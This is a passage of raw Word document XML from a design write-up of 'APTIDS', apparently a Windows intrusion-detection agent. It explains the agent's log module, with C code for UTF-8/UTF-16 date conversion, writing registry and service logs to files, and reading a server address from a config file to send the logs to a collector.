        <w:t xml:space="preserve"> The time return by “localtime” is in UTF-8 format, for return the date time value in bot UTF-8 and UTF-16, we implement a conversion in getDateTime.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//Conver to Unicode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lpTimeBuffer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INT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> cbByteNeeded = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MultiByteToWideChar(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CP_UTF8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 0, timeBuffer, -1, lpTimeBuffer, 0);</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lpTimeBuffer = (</w:t>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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">cbByteNeeded,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LPWSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993912" w:rsidRDefault="00993912"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MultiByteToWideChar(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CP_UTF8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 0, timeBuffer, -1, lpTimeBuffer, cbByteNeeded);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7"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993912" w:rsidRDefault="00993912" w:rsidP="00993912">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When the first argument is set to NULL and the second is passed in a wide char pointer (LPWSTR), getDateTime returns datetime data in UTF-16 format. Vice versa, it returns data in UTF-8. When both arguments are set, it returns data in UTF-8 and UTF-16. When both are NULL, it returns none.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993912" w:rsidRDefault="00993912" w:rsidP="00993912">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE47BE" w:rsidRDefault="00BE47BE" w:rsidP="00993912">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The second operation in Log Module is for writing log, which is a function called “WriteLog”.</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WriteLog(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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xml:space="preserve">, </w:t>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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>wchLogBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) {</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wchLogFile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wchLogTmpFile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hFile;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE47BE" w:rsidRDefault="00BE47BE" w:rsidP="00BE47BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>WriteLog specified a DWORD variable called “dwLogType” for identifying the type of log data being written. There are 2 type of log data in APTIDS, the LOG_TYPE_REGISTRY and LOG_TYPE_SERVICE defined in DataTypes.h.</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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>#define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LOG_TYPE_REGISTRY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>#define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LOG_TYPE_SERVICE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7"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BE47BE" w:rsidRDefault="00BE47BE" w:rsidP="00BE47BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">When calls for writing log, APTIDS modules </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> specify exactly which log type this data need to be written. Based on the log type, WriteLog generate specific name for log file and write data to that file.</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color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>switch</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LOG_TYPE_REGISTRY</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wchLogFile = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>L"Logs/Registry.log"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wchLogTmpFile = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>L"Logs/tmpRegistry.log"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LOG_TYPE_SERVICE</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wchLogFile = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>L"Logs/Services.log"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wchLogTmpFile = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>L"Logs/tmpService.Log"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BE47BE">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BE47BE" w:rsidRDefault="0074553E" w:rsidP="00BE47BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">There are 2 type of log files for each log type. A main log file which is used for storing log in the local system. This file will be written continuously. Another file is a temperamental log file, which is used to store a single line of the newest log data. This file and its content is read by a function for sending log to DLCH. </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Write to end of file</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dwByteNeeded = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>_tcslen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>wchLogBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</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LPOVERLAPPED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> lpOverLapped = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPOVERLAPPED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>calloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1,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OVERLAPPED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>));</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lpOverLapped-&gt;Offset = 0xffffffff;</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lpOverLapped-&gt;OffsetHigh = 0xffffffff;</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dwByteNeeded *= 2;</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WriteFile(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hFile, (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPWSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>wchLogBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, dwByteNeeded, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, lpOverLapped);</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CloseHandle(hFile);</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//OPEN AND WRITE TO TEMP LOG FILE</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hFile = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CreateFileW(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">wchLogTmpFile, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GENERIC_WRITE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>FILE_SHARE_READ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CREATE_ALWAYS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 0, 0);</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WriteFile(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hFile, (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPWSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>wchLogBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, dwByteNeeded, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003813E4" w:rsidRDefault="003813E4" w:rsidP="003813E4">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t>CloseHandle(hFile);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="003813E4">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0A48F6" w:rsidRDefault="000A48F6" w:rsidP="000A48F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A48F6" w:rsidRDefault="000A48F6" w:rsidP="000A48F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, </w:t>
      </w:r>
      <w:r w:rsidR="00EF58FF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Log Module calls a function name “Networking” for sending log to DLCH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF58FF" w:rsidRDefault="00EF58FF" w:rsidP="000A48F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When APTIDS is fired up for the first time in a machine, it get</w:t>
      </w:r>
      <w:r w:rsidR="00F33A57">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the machine’s computer name and windows version, then store them in a file called “System.info”, the content looks like:</w:t>
      </w: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Pr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF58FF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>## This is System Information File</w:t>
      </w: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sidRPr="00EF58FF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>## You can Modify it and save with ASCII or UTF8 encoding</w:t>
      </w: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sidRPr="00EF58FF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>&lt;ComputerName&gt;P3N3TR4T10N&lt;/ComputerName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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sidRPr="00EF58FF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>&lt;WindowsVersion&gt;10.0&lt;/WindowsVersion&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="00EF58FF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="00EF58FF" w:rsidP="00EF58FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
      <w:r w:rsidR="002565A7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> is called by WriteLog, it defines some essential variables:</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Networking(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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pServerIP, pPort;</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pStart, pEnd;</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dwPort;</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dwResult, dwByteRead;</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pBuffer;</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dwErrorCode;</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565A7" w:rsidRDefault="002565A7" w:rsidP="002565A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>pServerIp: A string for storing Server’s IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="002565A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">pPort: A string for storing Server’s port </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="000B77BF" w:rsidP="002565A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>dwPort: A DWORD variable for storing Server’s port, this is the number converted from pPort using “atoi” function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B77BF" w:rsidRDefault="00202D03" w:rsidP="000B77BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Firstly, Networking reads “Networking.conf” which is a file stores information such as Server IP address and port. Networking uses this information for connecting to a server implemented in DLCH.</w:t>
      </w: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 Networking configuration that Agent uses to connect to Server</w:t>
      </w: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 You can modify it and save it as ASCII format or UTF8 format</w:t>
      </w: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&lt;Server&gt;192.168.100.21&lt;/Server&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00202D03" w:rsidRPr="000B77BF"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&lt;Port&gt;55679&lt;/Port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF58FF" w:rsidRDefault="00EF58FF" w:rsidP="00EF58FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00202D03">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">When we need to change the Server’s IP, we only </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00202D03">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00202D03">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> modify the information between “&lt;Server&gt;” and “/Server&gt;”</w:t>
      </w:r>
      <w:r w:rsidR="004827A8">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> tags, or modify the number between “&lt;Port&gt;” and “&lt;/Port&gt;” to change server port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE0062" w:rsidRDefault="00AE0062" w:rsidP="00AE0062">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Networking then calls “SendLogToServer” passing the Server IP address and Port for connecting to DLCH.</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SendLogToServer(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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pServerIP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>dwPort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>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 GETTING LOCAL SYSTEM INFORMATION === //</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dwErrorCode, </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dwByteRead,</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dwResult;</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static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
